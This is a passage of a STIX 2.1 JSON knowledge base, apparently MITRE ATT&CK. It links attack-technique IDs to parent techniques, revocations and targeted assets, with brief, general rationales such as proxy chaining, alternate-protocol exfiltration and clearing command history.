"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", "target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--76e3589a-357f-4ba3-90fb-6363f45381c2", "created": "2024-05-23T04:09:21.962Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:40:34.027Z", "description": "Asset Mapping Rationale: Adversaries may chain together multiple proxies to disguise the source of malicious traffic. In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain.", "relationship_type": "targets", "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--76fd5c9b-2158-4372-85b6-a6961b68aaed", "created": "2020-03-21T00:43:01.580Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--77559f07-2f75-4eab-962f-3705b9ad704b", "created": "2020-10-01T01:01:00.257Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2", "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--77566f94-5e26-41c9-892f-2f62b395afe7", "created": "2023-09-28T20:01:43.057Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:01:43.057Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7799861e-ea03-4574-9170-e4b3ba241cc5", "created": "2020-02-21T21:11:07.166Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--d519cfd5-f3a8-43a9-a846-ed0bb40672b1", "target_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--77f3a64d-227d-487f-8484-89007e05b59f", "created": "2023-09-28T21:16:14.153Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:16:14.153Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--786778a1-d043-49ad-bd73-1834b21f4ac1", "created": "2020-01-24T14:13:46.127Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--78881a3d-59ad-4fbb-8bd2-69388a068584", "created": "2023-09-29T18:01:45.518Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:01:45.518Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--788a2994-f3fd-4ac4-9ef3-06a72a4e1631", "created": "2023-09-28T21:09:33.225Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:09:33.225Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--78aef07b-5bb6-4072-a9ea-2c2cdc95b43b", "created": "2024-05-23T04:14:39.800Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:42:32.748Z", "description": "Asset Mapping Rationale: Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel.", "relationship_type": "targets", "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--78bde505-a353-4cae-a978-f87de382f3fd", "created": "2020-10-01T00:44:24.068Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795", "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--78be1fd9-41ae-4606-9230-085d852a191f", "created": "2024-05-22T15:15:28.471Z", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-22T15:15:28.471Z", "description": "Asset Mapping Rationale: Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Password reuse may allow the abuse of local accounts across a set of machines on a network.", "relationship_type": "targets", "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--78eecb81-4803-48d1-abc0-7667594ea251", "created": "2020-01-28T17:11:54.416Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36", "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--79235599-e23f-43cb-9c56-1eb22b7c4664", "created": "2023-09-29T16:38:38.201Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:38:38.201Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--79407d1e-8e16-48c1-939c-ad92f91dd988", "created": "2023-09-29T16:30:19.141Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:30:19.141Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--798de2f3-218b-4622-a62c-84e3840d45a6", "created": "2023-09-29T18:00:10.845Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:00:10.845Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--799eccf9-478d-421e-8f14-074b5546cb6a", "created": "2020-01-24T14:52:25.778Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--79c6d710-baf4-411e-a3f5-9cb8d42b7c19", "created": "2023-09-29T16:32:22.510Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:32:22.510Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--79cf4e4a-aa04-4414-85a8-17cc6f0cad18", "created": "2020-03-20T16:01:21.024Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--9b52fca7-1a36-4da0-b62d-da5bd83b4d69", "target_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7a35d985-17ae-429a-b828-08d34e92002f", "created": "2020-01-31T18:59:01.162Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--d21a2069-23d5-4043-ad6d-64f6b644cb1a", "target_ref": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7aaa683d-9f91-4c9d-a391-9c7bdedb748a", "created": "2024-05-22T17:16:30.315Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:44:53.041Z", "description": "Asset Mapping Rationale: In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Adversaries may also leverage a Network Device CLI on network devices to clear command history data.", "relationship_type": "targets", "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7aaab0ef-69b8-4b34-98bc-8a83ff654884", "created": "2020-02-21T20:57:38.303Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--086952c4-5b90-4185-b573-02bad8e11953", "target_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7b1e00af-11fb-4862-a193-55dc9b6652c0", "created": "2023-09-29T16:33:23.456Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:33:23.456Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7b39173a-092f-4e79-ad19-3af1c780c06c", "created": "2020-03-16T15:31:05.883Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7b814e39-71fc-4e99-b46f-b24eca6cc780", "created": "2023-09-28T19:45:42.727Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:45:42.727Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7b95b2aa-9561-494f-8e02-d36edc14e38b", "created": "2023-09-29T17:39:54.089Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:39:54.089Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7bb1dbec-7314-479a-9496-86f8e25041eb", "created": "2023-09-29T16:40:43.415Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:40:43.416Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7bbe6ac7-d0fb-40e4-8537-bdded7173f07", "created": "2023-09-29T18:49:01.768Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:49:01.768Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7bd46875-7d59-4d65-8f9b-d48d3cb54a84", "created": "2023-09-28T20:07:15.553Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:07:15.553Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7be2d11d-87be-4d1c-8f5b-b7e59ad191ea", "created": "2023-09-28T20:07:01.309Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:07:01.309Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7bf67f44-6349-4576-8145-44e53a91676a", "created": "2020-03-11T14:58:52.196Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", "target_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7c30237d-5d03-4f5f-9488-3629f2b1813c", "created": "2022-08-22T20:42:08.635Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-08-22T20:42:08.635Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7c433b29-0ad3-4574-990f-e3d6291e7f23", "created": "2023-09-29T18:48:29.126Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:48:29.126Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7cb81e24-b3b8-4a56-b153-3247193de120", "created": "2020-01-19T16:59:45.705Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "target_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7cd00d93-860b-4138-98fc-162cb56a78dd", "created": "2020-03-13T11:12:18.760Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7cf1506f-3064-4d8f-ac50-ff6b9a4fd3c3", "created": "2020-12-17T02:14:34.275Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", "target_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7d244034-588d-4861-81ea-8c1db44f7055", "created": "2020-01-24T14:17:44.082Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7d42ba22-9595-4463-8dda-c0e47a154fed", "created": "2023-09-28T20:07:48.301Z", "created_by_ref": 